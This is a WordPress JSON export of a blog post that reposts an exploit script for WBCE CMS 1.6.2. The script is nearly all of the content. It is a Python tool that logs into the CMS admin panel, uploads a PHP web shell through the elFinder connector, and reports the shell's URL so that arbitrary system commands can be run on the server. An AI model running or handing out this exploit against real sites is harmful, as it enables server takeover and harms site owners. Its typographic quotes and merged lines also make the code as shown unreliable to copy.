{"id":57233,"date":"2024-06-03T18:49:48","date_gmt":"2024-06-03T15:49:48","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178891\/wbcecms162-exec.txt"},"modified":"2024-06-03T18:49:48","modified_gmt":"2024-06-03T15:49:48","slug":"wbce-cms-1-6-2-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wbce-cms-1-6-2-remote-code-execution\/","title":{"rendered":"WBCE CMS 1.6.2 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: WBCE CMS v1.6.2 – Remote Code Execution (RCE)
# Date: 3\/5\/2024
# Exploit Author: Ahmet \u00dcmit BAYRAM
# Vendor Homepage: https:\/\/wbce-cms.org\/
# Software Link:
https:\/\/github.com\/WBCE\/WBCE_CMS\/archive\/refs\/tags\/1.6.2.zip
# Version: 1.6.2
# Tested on: MacOS<\/p>\n

import requests
from bs4 import BeautifulSoup
import sys
import time<\/p>\n

def login(url, username, password):
print(“Logging in…”)
time.sleep(3)
with requests.Session() as session:
response = session.get(url + “\/admin\/login\/index.php”)
soup = BeautifulSoup(response.text, ‘html.parser’)
form = soup.find(‘form’, attrs={‘name’: ‘login’})
form_data = {input_tag[‘name’]: input_tag.get(‘value’, ”) for input_tag in
form.find_all(‘input’) if input_tag.get(‘type’) != ‘submit’}
# Kullan\u0131c\u0131 ad\u0131 ve \u015fifre alanlar\u0131n\u0131 dinamik olarak g\u00fcncelle
form_data[soup.find(‘input’, {‘name’: ‘username_fieldname’})[‘value’]] =
username
form_data[soup.find(‘input’, {‘name’: ‘password_fieldname’})[‘value’]] =
password
post_response = session.post(url + “\/admin\/login\/index.php”, data=form_data)
if “Administration” in post_response.text:
print(“Login successful!”)
time.sleep(3)
return session
else:
print(“Login failed.”)
print(“Headers received:”, post_response.headers)
print(“Response content:”, post_response.text[:500]) # \u0130lk 500 karakter
return None<\/p>\n

def upload_file(session, url):
# Dosya i\u00e7eri\u011fini ve ad\u0131n\u0131 belirleyin
print(“Shell preparing…”)
time.sleep(3)
files = {‘upload[]’: (‘shell.inc’,”””<html>
<body>
<form method=”GET” name=”<?php echo basename($_SERVER[‘PHP_SELF’]); ?>”>
<input type=”TEXT” name=”cmd” autofocus id=”cmd” size=”80″>
<input type=”SUBMIT” value=”Execute”>
<\/form>
<pre>
<?php
if(isset($_GET[‘cmd’]))
{
system($_GET[‘cmd’]);
}
?>
<\/pre>
<\/body>
<\/html>”””, ‘application\/octet-stream’)}
data = {
‘reqid’: ’18f3a5c13d42c5′,
‘cmd’: ‘upload’,
‘target’: ‘l1_Lw’,
‘mtime[]’: ‘1714669495’
}
response = session.post(url + “\/modules\/elfinder\/ef\/php\/connector.wbce.php”,
files=files, data=data)
if response.status_code == 200:
print(“Your Shell is Ready: ” + url + “\/media\/shell.inc”)
else:
print(“Failed to upload file.”)
print(response.text)<\/p>\n

if __name__ == “__main__”:
url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]session = login(url, username, password)
if session:
upload_file(session, url)<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: WBCE CMS v1.6.2 – Remote Code Execution (RCE)# Date: 3\/5\/2024# Exploit Author: Ahmet \u00dcmit BAYRAM# Vendor Homepage: https:\/\/wbce-cms.org\/# Software Link:https:\/\/github.com\/WBCE\/WBCE_CMS\/archive\/refs\/tags\/1.6.2.zip# Version: 1.6.2# Tested on: MacOS import requestsfrom bs4 import BeautifulSoupimport sysimport time def login(url, username, password):print(“Logging in…”)time.sleep(3)with requests.Session() as session:response = session.get(url + “\/admin\/login\/index.php”)soup = BeautifulSoup(response.text, ‘html.parser’)form = soup.find(‘form’, attrs={‘name’: ‘login’})form_data = …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57233","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57233","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57233"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57233\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}